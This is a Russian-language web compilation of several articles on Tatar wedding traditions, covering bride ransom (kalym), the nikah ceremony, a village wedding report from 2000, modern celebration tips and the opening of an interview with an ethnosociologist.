Выкуп сценарий на татарском языке: Сценарий выкупа невесты на татарском языке

Сценарий выкупа невесты на татарском языке


  • Истоки выкупа невесты по-татарски
  • Значение и размер калыма
  • Интересный факт
  • Сценарий выкупа невесты

  • Он мужественен и галантен, она нежна и прекрасна… Свадьба — всегда самый светлый и радостный день в жизни двоих, и, конечно же, их близких. У каждого народа есть свои обычаи и традиции от момента сватовства и до празднования самой свадьбы.

    И даже на территории России свадьбы людей разных национальностей отличаются свойственным им колоритом.

    Татарская свадьба имеет традиции, которые уходят вглубь веков. Во многом они схожи с обычаями и других южных народов, и это не удивительно, ведь татары — мусульмане.

    Религия стала основой создания особых обрядов мусульманской свадьбы. До сих пор у народа существует обычай сватовства и выкупа невесты по-татарски. Но в будущей семье муж должен быть достаточно богат, чтобы в полной мере уплатить за суженую калым.

    О том, что нужно выкупать невесту, и какой приблизительный размер калыма назначен за девушку, мужчины узнают от своих родителей.

    Его размер оговаривается еще на этапе сватовства. Встречаются родители будущих молодоженов и подробно обсуждают все детали будущей свадьбы.

    Важно знать! Жених и невеста в этом общении никогда не принимают участие.

    Арабский вариант выкупа невесты по-татарски имеет особое значение. Этот обряд показывает, имеет ли будущий муж достаток и сможет ли в будущем он содержать семью.

    Второй момент (не менее важный) — это возможность родителям невесты немного «поживиться» за счет жениха. Но если не обращать внимания на материальную сторону вопроса, то можно увидеть в этом пусть даже обязательном для мужчины обряде — благородный ритуал щедрой благодарности жениха родителям невесты за прекрасную будущую жену.

    Ведь именно их красавицу он приведет в свой дом, чтобы она стала помощницей его родителям, хозяйкой его дома и матерью его будущих детей.

    Совет! Жених должен обратить внимание на количество и ценность подарков — они показывают степень его любви к молодой супруге и уважение к ее родителям.

    Это может быть и определенная сумма денег, и золотые украшения, в сельской местности это может быть и домашний скот, к примеру, бараны, блюда из которого готовят в татарской кухне.

    Строгий и официальный калым – эта своеобразная мера, которая характеризует социальное положение новоиспеченного мужа.

    Мужская половина людей татарской национальности вступают в брак в довольно позднем возрасте. Это объясняется большой величиной калыма. Социальный статус у многих разный, и чтобы иметь достаточное количество денег и выкупить желанную татарскую красавицу, необходимо много лет.

    Важно! После того как жених выплачивает выкуп, родители невесты дают окончательное согласие на бракосочетание. Это основной калым невесты, остальной жених совершает, когда едет во время свадьбы к суженой.

    При появлении жениха в день свадьбы путь к будущей жене преграждают будущие родственники. Сельчане и близкие невесты требуют выкуп. Для того чтобы проехать, дружок оплачивает путь мелкими гостинцами.

    Запертые ворота дома возлюбленной могут стать еще одним препятствием для жениха и его свиты. Тот должен знать, что, возможно, ему придется долго стучать в дверь, пока ему откроют, а для того чтобы зайти, придется откупиться сладостями.

    У дверей дома невесты жениху важно проявить смекалку и сообразительность. Загадки ему будет задавать либо остроумный брат жены, либо мудрый отец молодой.

    Далее наступает пора подружкам невесты получить свою долю выкупа – они озадачат жениха каверзными вопросами. В награду девушки получают сладости и украшения. После щедрых даров жениха они пропустят его свиту к подруге.

    На скамье среди женщин, покрытых одинаковыми платками, будущий супруг должен узнать свою невесту. После этого жениху нужно выкупить место за столом рядом со своей суженой. Пройдя все испытания выкупа невесты по-татарски, жених садился возле возлюбленной на одну подушку. Этот момент означает, что будущий муж готов разделить радости и горести в течение всей жизни с любимой.

    Испытания пройдены, и родители молодых благословляли пару на брачный обряд. Выкуп невесты завершен, но он наверняка, надолго запомнится молодым и их близким.

    как проходил никах — Реальное время

    Как татары проводили никах: особенности национальной женитьбы, послесвадебные обряды и ломка традиций

    Казанский этнограф и наш колумнист Дина Гатина-Шафикова продолжает знакомить читателей «Реального времени» с особенностями татарской свадьбы. В сегодняшней авторской колонке, написанной для нашей интернет-газеты, она рассказывает уже о самом обряде никаха, послесвадебных обычаях и современном возрождении религиозно-культурных элементов национального бракосочетания.

    Никах без молодоженов

    Само свадебное действие — никах туй, по словам К. Насыри, проходило «обязательно в доме родителей девушки. Здесь же происходит и обрядовое чтение никаха. В тот же день застолье организуется и в доме жениха. Невесте в счет подарка и выкупа посылается хороший сундук, большое дорогое зеркало, лучших сортов штоф или бархат, отрезы ситца на несколько платьев, шаль, дорогой калфак, ичиги, туфельки, различные фрукты и перстни, ножи, мелкие зеркала, помада, белила — все это в счет подарков. Здесь же в сундуке отсылают деньги — причитающийся выкуп. Затем посылают несколько хлебов лучшего сорта, полпуда меда и полпуда масла. Больше или меньше — в зависимости от размера меджлиса».

    Свадьба начиналась с проведения религиозного обряда бракосочетания — никах. Согласно «Сборнику циркуляров и иных руководящих распоряжений по округу Оренбургского магометанского Духовного собрания 1841—1901 гг.», «обрядовая сторона брака между магометанами, по шариату, состоит в совершении «Гакыд» словами «изябъ-кабула», т. е. брачующаяся невеста, лично или через поверенного, должна сказать: я (назвав имя отчество) отдала себя в жены такому-то (тоже назвав имя отчество), а жених тоже лично или через поверенного повторить слова невесты, заменив выражение «отдала себя в жены» словами «взял в жены». Гакыд должен происходить непременно при свидетелях. Не менее двух правоспособных мужчин, или один мужчина и две женщины магометанского вероисповедания, при этом договаривающиеся лица должны ясно слышать слова друг друга, а свидетели должны слышать слова договаривающихся, все это должно произойти в одно и то же время, в одном и том же месте».

    Согласно «Сборнику циркуляров и иных руководящих распоряжений по округу Оренбургского магометанского Духовного собрания 1841—1901 г.», «обрядовая сторона брака между магометанами, по шариату, состоит в совершении «Гакыд» словами «изябъ-кабула». Фото turklib.com

    В связи с тем, что обычно на данной церемонии молодые не присутствовали, за жениха отвечал отец, а за невесту ее уполномоченные —вәкил (они специально отправлялись в то место, где находилась невеста, и, выслушав ее положительный ответ, передавали его мулле).

    После совершения церемонии, мулла записывал в книгу регистрации брака условия заключения брака — мәһәр (калын, продукты или их стоимость, переданные стороне невесты до заключения брака). Детально описывалась определенная сумма денег, которую в случае развода по инициативе мужа он должен был выплатить жене.

    После церемонии начиналось застолье, которое имело свою специфику. Женщины находились отдельно от мужчин. Обычно, женщины угощались после того, как расходились мужчины, или оно могло проходить одновременно, но в разных половинах дома.

    Жених на неделю

    Сами свадебные мероприятия с совместными угощениями могли проходить до трех дней. Приезжих, после угощения в доме невесты, забирали родственники. Иногда по очереди всех гостей могли приглашать к себе.

    Свадьба в доме жениха могла проходить намного позже, после основного мероприятия в доме невесты, и срок этот зависел от того, насколько долго молодая останется в доме своих родителей.

    Все последующие мероприятия были уже после свадьбы.

    После завершения никах туй, когда разъехались все гости, в доме невесты начинали готовиться к приезду жениха. Особое внимание уделялось приготовлению постели для молодых. Старались выбрать замужнюю женщину, удачливую в браке. Кровать огораживалась большой занавесью — чаршау, или, если была возможность, полностью занавешивали пологом —чыбылдык. Стелили две перины, которые по одной, по окончании ночи, убирали. После того, как приготовили постель, в нее клали либо ребенка, или счастливую семейную пару с детьми.

    Интерьер парадной половины дома. Фото archive.gov.tatarstan.ru

    Жениха в сопровождении друга или друзей, вечером привозили родственники (молодые юноши или мужчины) невесты. В дом их пускали только после уплаты выкупа. Гостей угощали, молодым накрывали стол к чаю и оставляли наедине. За ними ухаживала специально выбранная женщина, которая также за эту работу получала подарки.

    Утром для молодоженов топили баню. После этого молодой супруг надевал новую одежду, сшитую его женой, а взамен он одаривал ее каким-нибудь ценным подарком (украшения, платки и пр.).

    Молодожены первые дни были только в своей комнате и никому не показывались. Супруг мог заночевать обговоренное заранее определенное количество дней, а затем уехать, так и не показавшись никому из родственников жены. Чаще всего родители или сами заходили в комнату утром к молодым, или приглашали на совместное чаепитие, где одаривали зятя подарками.

    В первый свой приезд муж мог остаться до недели или чуть больше. Затем он уезжал обратно и впоследствии приезжал по четвергам, а утром в пятницу снова уезжал. Подобное гостевание было разным по времени (жена могла перебраться в дом мужа, уже самой являясь матерью), и зависело все от разных причин (материальные, семейные и прочие). По этому поводу А. Сперанский писал: «Так живут они год, два и даже три. Потом жена приезжает к мужу окончательно, имея иногда уже двоих детей».

    К мужу… навсегда

    В большинстве своем переезд молодой в дом мужа приурочивали к Джиену. Причем обрядовая составляющая в разных местностях отличалась. Где-то прощание происходило в доме родителей молодой жены, но его могли проводить и в том доме, где ей предстояло жить. Причем приданное, перевозимое невестой в новый дом, было значительным. По этому поводу, Каюм Насыри отмечал, что «вслед за невестой в дом жениха переправляется довольно много вещей. Обычно вначале посылаются подарки жениха: зеркало, сундук (кроме него еще несколько сундуков с вещами самой невесты). Среди вещей обязательно есть пуховая перина, пуховые подушки, четыре маленькие подушки, верх у которых из хорошего ситца или шелка. Еще дорогое ситцевое или шелковое одеяло, такой же полог для кровати. Кроме того, самовар, два кумгана, медный таз, два больших подноса, две дюжины тарелок, столько же серебряных ложек, две дюжины ножей и вилок, несколько дюжин столовых приборов, два медных подноса под самовар, несколько дюжин салфеток, несколько скатертей, полотенец. Ни одну из своих вещей невеста не оставляет в родительском доме, недаром говорится в народе: «Невесты в отчем доме помело — и то боится».

    Среди вещей обязательно есть самовар, два кумгана, медный таз, два больших подноса, две дюжины тарелок, столько же серебряных ложек. Фото archive.gov.tatarstan.ru

    Встречали молодоженов не только ближайшие родственники, но и соседи. Для этого молодая готовила небольшие подарки, которыми одаривала присутствующих.

    В обрядовой составляющей встречи новоиспеченной жены входило и обряжение дома, где ей предстояло жить. Обычно его проводили в день приезда молодой в дом супруга. Везде снимались занавеси и вешались новые из приданого невесты. Также бытовал обряд знакомства молодой с родником, или показ дороги по воду, когда на следующий день после приезда ее вели к роднику, из которого ей предстояло носить воду.

    Застолья по случаю приезда молодой были сходны со свадебными, ранее организованными стороной невесты. Однако в отличие от предыдущих торжеств, здесь не было родителей невесты (для них все устраивали отдельно), к тому же основными участниками были и сами молодожены, присутствующие на мероприятиях по этому случаю. По их окончании уже в тесном семейном кругу молодожены ездили в гости к ее родителям, а в дом жениха приглашали родителей невесты. Эти мероприятия как бы ознаменовывали окончание цикла свадебной обрядности.

    Исключения из правил

    Безусловно, описанные выше мероприятия показывают классический тип сватовства, когда и родители, и молодые согласны. Однако, как и было описано ранее Ахмаровым, существовали еще два типа (насильственный и без одобрения родителей), в рамках которых данная свадебная обрядность в полной мере не соблюдалась.

    ХХ век внес свои коррективы в обрядность татарского народа. Многое было унифицировано, что-то было потеряно, появилась новая праздничная культура в целом. Это время, когда браки стали регистрировать в ЗАГСе, порою, не совершая традиционного религиозного обряда (никах), а согласие родителей и договорные браки теряют свою силу. Молодожены сами стали выбирать себе супругов, не учитывая мнение старшего поколения.

    Все больше в нашем обиходе встречается словосочетание «татарская свадьба», «халяльная свадьба». Фото Максима Платонова

    В наши дни, как отмечают многие исследователи, наметилось возрождение интереса к традиционным формам культуры, включающим в себя и свадебную обрядность. Так, многие молодожены считают обязательным для создания семьи проведения религиозного обряда никах. Все больше в нашем обиходе встречается словосочетание «татарская свадьба», «халяльная свадьба». Однако необходимо отметить, что сегодня сформировалась новая свадебная обрядность, с сочетанием в себе общеисламских, европейских, и зачастую незначительно традиционно татарских форм свадебного обряда татар.

    Дина Гатина-Шафикова

    Справка

    Дина Гатина-Шафикова — научный сотрудник отдела этнологических исследований Института истории им. Ш. Марджани АН РТ.

    • В 2010 году окончила исторический факультет, на кафедре археологии в Казанском (Приволжском) федеральном университете.
    • В 2014 году окончила аспирантуру в Институте истории им. Ш. Марджани АН РТ.
    • С 2010 по 2013 годы сотрудник Национального музея Республики Татарстан.
    • Исследовательские интересы: визуальная антропология, татарский костюм, история волго-уральских татар.
    • Автор ряда научно-популярных и исследовательских публикаций. Колумнист «Реального времени».

    Татарская свадьба — туи : Республика Татарстан

    Традиции

    Татарская свадьба — туи

    Геннадий МИХЕЕВ. Республика Татарстан.


    Современная татарская свадьба, конечно, изменилась по сравнению с той, которую можно было увидеть лет эдак сто назад. Жаль, что традиции забываются, ведь именно свадьба наиболее полно выражает эстетику и миропонимание этноса. И потому по-настоящему приятным открытием явилась для меня информация о том, что в далекой татарской деревне Кызыл-Ялан, что в Чистопольском районе, свадьба еще справляется по старинным обычаям. Захотелось увидеть ее собственными глазами.

    Время свадеб у татар — ноябрь. Это напрямую связано с окончанием сельскохозяйственных работ. Погода в последний осенний месяц в Среднем Поволжье, конечно, не радует, ну да что делать!

    Самое популярное пожелание молодоженам переводится примерно так: «Живите красиво и скачите на коне счастья!» В этих словах — любовь к лошади, которая у татар в крови.

    А вообще татарская свадьба во многих деталях схожа с русской. Но далеко не во всех. Все-таки татары — мусульманский народ (за исключением незначительного числа крещеных татар), и это, несомненно, отражается на странном, а иногда и таинственном колорите татарской свадьбы.

    «Странность» проявляет себя сразу. Если у славян жених сам приезжает за невестой, то у татар сначала родственники невесты едут домой к жениху — «забирать» его. И лишь потом, как бы уговорив парня, они отвозят его к будущей жене. Но не к ней домой, а совсем в другое помещение, называемое кияу-киляэте. В нем прячут невесту, а потом здесь же пройдет первая брачная ночь. Раньше, говорят, кияу-киляэте располагалось в специальных сарайчиках, построенных невдалеке от дома, сегодня молодые «арендуют» дом у соседей на пару дней.

    Кстати, о молодых. Невесту из Кызыл-Ялана зовут Раиля Мукменова. Она учительница начальных классов в местной школе. Жених — Рустем Генияттулин — механизатор. Если у вас возник вопрос о калыме (платится ли?), отвечу: нет.

    Точнее, жених тратит некоторые деньги, чтобы проникнуть в кияу-киляэте к невесте и преодолеть разнообразные препятствия, которые подруги невесты чинят претенденту. В нашем случае жених с друзьями совершили «кавалерийский наскок», в результате чего невеста была захвачена почти без выкупа. В противовес жениховому калыму невеста должна быть обеспечена приданым (постель, одежда, домашнее убранство и пр.), называемым бирне. Вообще в мусульманско-татарской свадьбе все устроено так, что невесту неискушенному наблюдателю искренне жаль. На всем протяжении действа она не улыбается, не ест, не пьет, не разговаривает. Играет, так сказать, роль манекена. И еще: молодым на людях не принято целоваться, да и вообще выказывать друг другу какие-либо чувства!

    Когда жених наконец добирается до невесты, они направляются в ее родной дом, где за накрытым столом их ждут все деревенские старейшины. Бабай-лар (дедушки) сидят справа, эби-лер (бабушки) — слева. Молодые скромно присаживаются у самого краешка стола.

    Начинается Никах. Это самое главное таинство татарской свадьбы. По своему смыслу это что-то вроде православного венчания. Обряд ведет мулла. Он мерно читает книгу. Естественно, слова на арабском и татарском языках мне непонятны, но смысл говоримого муллой до меня доходит. Никах — это наставление молодым, духовное и практическое. И есть глубокий смысл в том, что Никах читается не в мечети (а в Кызыл-Ялане красивая небесно-голубая мечеть), а в доме. Клятва Аллаху отходит на второй план. Свидетелями бракосочетания становятся все деревенские старики, то есть уважаемые люди.

    Никах читается около часа. Все время молодые сидят, потупив взор, и лишь потом участвуют в краткой молитве. После чего молча выходят. Теперь они полноправные муж и жена.

    Итак, молодые едут дальше, в соседнее село, — расписываться в сельсовете.

    Когда молодожены вернулись в дом невесты, пожилые уже удалились, и свадебный стол освободился. Для молодежи. Вообще столы накрыты в двух домах. В невестином доме собирается молодежь, а в доме одного из родственников пируют представители среднего возраста. Своеобразные «клубы по интересам». О питье. Пьют водку (аракы). И здесь снова замечаю отличие от славян. Если последние начинают «обмыв» почти сразу, еще только рассвет забрезжит, то татары все же ждут момента, когда необходимые обряды закончатся. После того можно уже и «оторваться по полной». Это называется кызыл-туй, или вечерняя свадьба. Собственно, выражается она в неуемном веселье с теперь уже обильным возлиянием. На два дня кряду.

    Ровно через неделю пир повторится, только теперь уже в доме у жениха.

    И последнее. Для меня абсолютным открытием стало то, что татары этнически неоднородны. Они делятся на несколько групп. В частности, в Чистопольском районе живут мишары. Эта группа так называемых западных татар. Себя мишары (в переводе «лесные люди») с абсолютной уверенностью считают самыми истинными татарами, потому что их язык наиболее приближен к древнетатарскому. Возможно, у других татарских народностей свадьбы совсем иные…

    © «Парламентская газета», N 216(0596), Дата выхода: 14/11/2000


    разбираемся в терминологии и начинаем применять на практике

    Татарская свадьба являет собой удивительно красивое и оригинальное торжество в соответствии с законами шариата, так как большинство татар – мусульмане. Богатые национальные обычаи одного из древнейших народов на земле превращают это событие в яркий самобытный праздник.

    Небольшой экскурс в историю

    Территория расселения татар простирается от Сибири до самого Крыма, у разноместных представителей есть некоторые различия в языке, но все равно это единая нация, обладающая крепким национальным духом, древней культурой, богатым литературным языком, своеобразными традициями и обрядами. В таком важном празднике, как свадьба, историческая память народа находит наиболее яркое отражение. На развитие свадебных традиций большое влияние оказали исторические события, которые происходили на землях, населенных татарами. Тем не менее можно проследить общие закономерности в обрядах, невзирая на то, что названия их порой отличаются. Основное различие заключается в обряде бракосочетания по религиозным канонам: у татар, исповедующих ислам, это проводимый в домашних условиях никах, а у татар-христиан – венчание в церкви.

    Свадебные обряды татар несут в себе определенный магический смысл – они призваны обеспечить достаток, спокойствие и многодетность молодой семьи. В начале XX века существовали три основные формы брака у татар: добровольный уход девушки, по сватовству и похищение невесты.

    До этого времени брак заключался в основном по сватовству, и тут необходимо было строго соблюдать обрядность. Причем характерность того или иного обряда определялась местностью, а различия носили общественный характер (продолжительность гуляний, число гостей, дороговизна подарков).

    Проведение торжества

    Гулять на татарской свадьбе по традиции принято по нескольку дней. Месяцем, на который приходится самое большое количество бракосочетаний, признан ноябрь, когда завершаются все сельскохозяйственные работы и наступает время отдыха от трудов праведных.

    А так как татары – мусульманская нация, то и процесс празднования свадьбы таит в себе несколько особенностей. Конечно, в настоящее время невозможно провести мероприятие, соблюдая в точности все обычаи, присущие татарской свадьбе прошлого столетия.

    Но добавить национального колорита в столь важную церемонию, как организация и проведение праздничного торжества, стоит обязательно. Украшают помещение для проведения торжества в зависимости от пожеланий, вкусовых пристрастий и религиозных предпочтений супругов. Не возбраняется использование стандартных наборов для декорирования свадебного зала – воздушных шариков, растяжек, пышных гирлянд из цветов и т.п.

    Феерично и празднично выглядит помещение, оформленное в национальном стиле: скатерти с татарскими узорами, предметы сервировки, маленькие подушечки-думочки для гостей в красно-золотых тонах и т.д.

    Особо верующие пары предпочитают, чтобы банкетный зал был украшен с обязательными элементами духовных наставлений и напутствий в счастливую семейную жизнь из священного Корана.

    Время диктует свои правила, и музыкальное сопровождение праздника также может быть теперь совершенно иным, нежели прежде. Наравне с национальными песнями на торжестве вполне закономерно и присутствие современных музыкальных композиций в исполнении отечественных и зарубежных артистов.

    Характерной чертой свадебного наряда невесты-татарки является закрытость всего тела по максимуму. Вместо фаты голову девушки покрывают красивым платком, полностью пряча её волосы. Ведь новобрачная отождествляется с непорочностью, смирением и добродетелью, а у мусульман особенно строго следят за нравственным поведением будущей супруги.

    Примеры праздничной одежды новобрачной можно увидеть на фото, сделанных на мусульманских свадьбах.

    Жениху предоставлена полная свобода в выборе праздничной одежды: это может быть костюм в европейском или национальном стиле. Главное, чтобы обязательно на голове присутствовала тюбетейка.
    В основе успешного проведения татарской свадьбы лежит правильно подобранный сценарий. Следует заранее договориться с тамадой о включении веселых, интересных конкурсов и развлечений для многочисленных гостей торжества.
    Не стоит пренебрегать свадебными обычаями и ритуалами – их присутствие в программе праздника поможет акцентировать внимание на семейных ценностях и традициях татарского народа. Ещё одной характерной особенность татарской свадьбы является то, что родители невесты забирают её избранника из его дома и доставляют к суженой.

    Новобрачные встречаются в так называемом доме жениха — кияу эйе.

    Если раньше приходилось строить отдельный домик к такому случаю, то теперь разрешается снять номер в отеле или арендовать квартиру.

    В этом помещении молодые проведут свою первую брачную ночь после свадьбы. По завершении всех вышеперечисленных мероприятий новоявленные супруги в сопровождении друзей и родственников отправляются в ресторан, где их ждет свадебный банкет.

    На нем принято часто произносить в честь молодых такие тосты на татарском языке, как «Котлы булсын!» и «Озын гомер!», что означает «Да прибудет счастье в вашем доме!» и «Долгой совместной жизни!», а также зачитывать стихи.

    В конце праздничного вечера молодые покидают гостей, чтобы провести совместную первую ночь в кияу эйе.

    Брак по сватовству: порядок проведения свадьбы

    Сватовство

    Сначала родственники жениха делали предложение невестиным родителям. Затем во время сватовства назначались дата проведения торжества и калым – это дары, которыми в татарской свадьбе выкуп невесты оплачивается (кстати, у татар он называется «калын»). Что входило в калым? Это были бытовые предметы, постельное белье, головные уборы, одежда и обувь. Также передавались деньги для приготовления невестиного приданого и вносилась лепта продуктами для праздничного банкета.

    Затем проводился сговор: во время него сторона жениха передавала деньги, а сторона невесты – полотенце или скатерть в подарок. Невестиных родственников, которые участвовали в сговоре, обязательно угощали различными лакомствами.

    Обряд никах

    В татарской свадьбе никах (или никах туй) – это официальная часть торжества согласно шариату. Проводился никах в невестином доме, родители жениха были на нем главными гостями. Жениховские родственники привозили с собой на свадьбу калым и угощения, если они еще не передали их до того. Роли всех родственников, участвующих в торжестве, оговаривались заранее: одни невестины родственники приносили лакомства, а другие приглашали к себе родственников жениха, всячески заботясь о них и предоставляя ночлег, так как свадьбу гуляли не один день.

    Сам обряд никах должен был проводить мулла, который записывал условия брака в особой книге. В это время перечислялись свадебные расходы со стороны жениха и оговаривалось, какая сумма будет выплачена жене в случае, если супруг захочет расторгнуть брак. Присутствия молодых при этом не требовалось. А кто же тогда отвечал на заветный вопрос «Согласны ли вы»? За невесту отвечали свидетели, а за жениха – его отец. Перед этим свидетели спрашивали о согласии невесты, которая находилась за занавесью или же в другой комнате. Услышав согласие обеих сторон, мулла в торжественной обстановке начинал зачитывать Коран. И только по завершении обряда никах начинался свадебный банкет.

    Праздничный банкет

    • Согласно традиции, торжество отмечалось за одним длинным столом, во главе которого сидели молодые, причем невеста всегда справа. Со стороны жениха сидели родители невесты, а со стороны невесты, соответственно, родители жениха. По обеим сторонам после родителей располагались свидетели, а после них – родственники невесты и жениха.
    • Спиртного на свадьбе у татар не было – исключительно морсы, компоты и другие безалкогольные напитки. В последнюю очередь подавался чай, а к нему традиционное блюдо чак-чак – это альтернатива привычному для нас свадебному торту. Кстати, чак-чак, который еще называют кызкумэче, подавался и во время обряда никах. Готовила сладкое лакомство, как правило, сторона невесты.
    • Кроме того, на столе обязательно присутствовали национальные блюда татарской кухни: губадия (круглый многослойный пирог), очпочмаки (что-то вроде пирожков, но только в форме треугольников), хорошо известные нам беляши и др. Обязательным блюдом был праздничный гусь, которого обычно привозили родственники жениха. Также необходимо отметить существование особых правил подачи и разделывания блюд. Во время этого процесса молодоженов одаривали деньгами и подарками.

    Свадебные гулянья

    Гости гуляли на свадьбе в невестином доме два или три дня, а после того, как они уезжали, начиналась подготовка к приезду жениха. Комнату молодых декорировали предметами из невестиного приданого, здесь паре предстояло провести несколько дней. Период первого жениховского приезда примечателен тем, что он должен был платить калым как за въезд во двор, так и за возможность увидеться с любимой, а еще тем, кто растапливал баню и расстилал постель. Невесте преподносился особо ценный презент. Длительность первого приезда жениха составляла от двух до шести дней (это зависело от калыма), после этого он навещал возлюбленную по четвергам и уезжал наутро.

    Когда калым был полностью выплачен, молодая жена наконец могла перебраться в дом мужа. И тут также неукоснительно соблюдались все традиции: мать мужа встречала невестку приветливыми словами и расстилала ей под ноги шубу либо подушку. Затем невестке необходимо было повесить полотенце и вкусить горбушку хлеба с маслом и медом – это чтобы она была уживчивой, мягкой и покладистой.

    Молодая жена должна была также погрузить руки в муку – для того чтобы в семье всегда был достаток. А еще обычаи, традиции татарской свадьбы предполагали декорирование дома предметами из невестиного приданого и показ молодой красавице дороги, ведущей к роднику. Невестке необходимо было одарить всех задействованных в этом процессе родственниц.

    После переезда жены продолжался банкет в домах родителей и родственников мужа. Молодая пара отправлялась с визитом в дом родителей жены, а те навещали дом жениха.

    Как проходит сватовство и помолвка

    Практически у всех народностей существует такой ритуал, как сватовство. В татарских семьях также принято сначала сговариваться между собой, а уж потом основательно готовиться к свадьбе. Делегация от жениха в составе двух человек – свата (яучы) и старшего родственника – отправляется к родителям невесты, чтобы в присутствии муллы получить согласие на бракосочетание молодой пары.

    Причем будущих супругов на важное мероприятие не приглашают. Процедура сватовства, как правило, состоит из трех моментов:

    1. Смотрины нареченной невесты.
    2. Рассказ сватов о женихе.
    3. Совещание сторон.

    При благополучном завершении первых двух этапов сватовства к переговорам подключаются родители молодого человека.

    Здесь начинают решаться вопросы, касающиеся материальных и не только сторон планируемого события:

    • размер и состав калыма от жениха;
    • объем приданого невесты;
    • местожительство молодоженов после свадьбы;
    • дата и время проведения торжества;
    • количество гостей.

    Назначенный выкуп, согласно традициям, выплачивается полностью накануне или непосредственно в день бракосочетания. Калым может состоять из украшений из золота или серебра, одежды, постельного белья, меховых изделий, дорогих ковров, а также конкретной суммы денег. После сговора невесту принято называть не иначе как ярашылган кыз, что в переводе с татарского означает «сосватанная девушка».

    В конечном итоге, решив все необходимые вопросы, связанные с организацией праздника, родственники оглашают дату помолвки.

    Другие формы брака

    Похищение невесты

    Иные формы брака у татар получили меньшее распространение. Что касается похищения невесты, женихи к этому древнему и, откровенно говоря, первобытному виду бракосочетания прибегали крайне редко – когда не получалось договориться. Похищенная невеста и ее родители соглашались на брак, чтобы избежать позора.

    Невзирая на то что похищение – само по себе дикость, и здесь тем не менее были свои правила. Например, вдовцы и зрелые женихи себе такого не позволяли, запрещалось похищать вдов, незнакомок и девушек из числа родственников. К тому же после похищения жениху приходилось выплачивать калым в гораздо большем размере, да и обряд никах проходил по упрощенной схеме.

    Случалось и так, что похищение инсценировали по обоюдному согласию сторон – как дань древней традиции. Это позволяло существенно сократить финансовые затраты на проведение торжества.

    Добровольный уход к жениху

    Данная форма брака получила наиболее широкое распространение в начале XX века и основывалась на взаимном желании сторон, однако порицалась обществом. У этой формы имелись свои преимущества: не было необходимости ждать, пока вступит в брак старший брат или сестра, условия сговора диктовались родителями жениха, что значительно уменьшало размер калыма.

    В основном все-таки и похищение, и добровольный уход девушки к жениху осуждались общественным мнением, поэтому такие формы брака были редкостью на рубеже XIX – XX веков.

    Изменения в общественной жизни в целом повлияли на традиции татарской свадьбы. Начало прошлого века было сложным периодом. Разруха после Гражданской войны привела к тому, что свадебные обычаи стали соблюдаться менее строго. В период 30 — 60-х годов сократились традиционные и возникли новые обряды татарской свадьбы. Однако главные моменты сохранились и соблюдаются по сегодняшний день – это понятно из видео обычаев татарской свадьбы.

    Советуем прочесть о красивой турецкой свадьбе. И в чем же прелесть яркой украинской свадьбы, читайте здесь.

    Подготовка к свадьбе

    Приготовления к свадьбе жениха и невесты длятся где-то в течение месяца. За это время жених должен приготовить калым в полном объеме, купить подарки для невесты и её родичей, необходимую утварь для дома. Девушка также занимается окончательной подготовкой приданого – шьет нижнее белье, платья. Обязательно готовит в подарок жениху вышитую парадную одежду – рубашку, штаны, носки и т.п.

    По татарским обычаям, свадебное торжество проходит в несколько этапов:

    1. Венчание молодой пары, по-татарски – Никах. Проходить эта церемония может как дома у невесты, так и в мечети. Проводит ее мусульманский священник – мулла в присутствии отца жениха и свидетелей новобрачных. Духовное лицо читает Коран, произносит соответствующую торжественному случаю молитву, по окончании которой брак считается зарегистрированным. Муфтий напутствует молодых супругов добрыми пожеланиями хранить семейный очаг в благости и мире. Молодая пара или свидетели от них дают священные обеты.
    2. Официальная регистрация брачного союза в органах ЗАГС.
    3. Туй – многодневный свадебный праздник. Вначале его организуют в жилище невесты, затем мероприятие переносится к жениху. В настоящее время дозволяется отмечать свадебное торжество в ресторанах, заказывая банкетный зал сразу на несколько дней.

    В случае давнего знакомства молодоженов, если родители не против их союза, разрешается проводить помолвку сразу после сватовства, то есть в один день.

    По этому поводу накрывают в доме невесты праздничный стол, за которым и решают все насущные вопросы по организации свадебного мероприятия. Будущие родственники обязательно одариваются презентами.

    Современная татарская свадьба

    Свадьба современных татар – это упрощенный вариант старинного обряда. Зачастую свадьба обходится без сватовства и уплаты калыма.

    Но сохранение религиозных традиций обязательно. Без обряда Никах союз не считается зарегистрированным.

    Современная невеста может позволить себе платье европейского фасона. Хотя многие невесты одеваются в традиционный наряд. Открыть можно только лицо и ладони. На голову надевают платок. Наряд традиционно белого цвета. Если выбор пал на платье в европейском стиле, то обычно поверх него невеста одевает кафтан, расшитый татарскими узорами. А на голову – феску (женский головной убор).

    Жених должен быть одет нарядно. На голове – тюбетейка. На талии – традиционный красный кушак.

    Интересные традиции во время застолья. Тамада, который проводит современную татарскую свадьбу, должен обязательно включить в сценарий следующее:

    • Молодые заходят в зал только после того, как все гости расселись по местам.
    • Традиционно татарские свадьбы проходят без спиртного. Поэтому тосты говорят за стаканом морса или сока
    • Традиция лепки денег длится обычно около 2х часов. Каждый гость должен заплатить деньги за то, чтобы для него поставили песню, и сплясать под нее.
    • Танец жениха с невестой обязательно должен быть включен в сценарий.

    БАЗА ЗНАНИЙ: Ингушская свадьба традиции и обычаи

    • Присутствие ансамбля с традиционным баяном – кульминация банкета.
    • Хорошо, если есть возможность нанять ансамбль национального танца. Отдавая дань традициям, многие молодожены не проводят шумную и насыщенную конкурсами свадьбу. Татарская свадьба – это застолье с песнями, танцами и живой музыкой.
    • Чак-чак – традиционное сладкое блюдо, которое должна приготовить невеста. В конце вечера каждый гость должен заплатить за кусочек чак-чака.


    Свадьба без жениха и невесты. Какие брачные традиции были у татар | КУЛЬТУРА

    Этносоциолог, кандидат исторических наук Розалинда Мусина рассказала «АиФ-Казань» о свадебных традициях татар, о том, какой выкуп платили за невесту и какие запреты накладывались на замужнюю татарку.

    Три формы брака

    Дарья Ходик, «АиФ-Казань»: Розалинда Нуриевна, в чём особенность семейно-брачных традиций татар прошлых эпох? У русских в Средневековье был свод правил «Домострой», а было ли что-то подобное у татар?

    Розалинда Мусина: После принятия ислама предками татар (волжскими булгарами. — Прим. авт.) в 922 году и по мере его распространения многие вопросы семейных отношений стали решать, исходя из норм Шариата. Вступление в брак стало священной обязанностью мусульманина. Кстати, среди крещёных татар (кряшен) вступление в брак также считалось необходимым и естественным. По свидетельству исследователя быта кряшен С. М. Матвеева, карт кыз (старых дев), а также мужчин-холостяков у них не было, исключая совсем неспособных к брачной жизни.

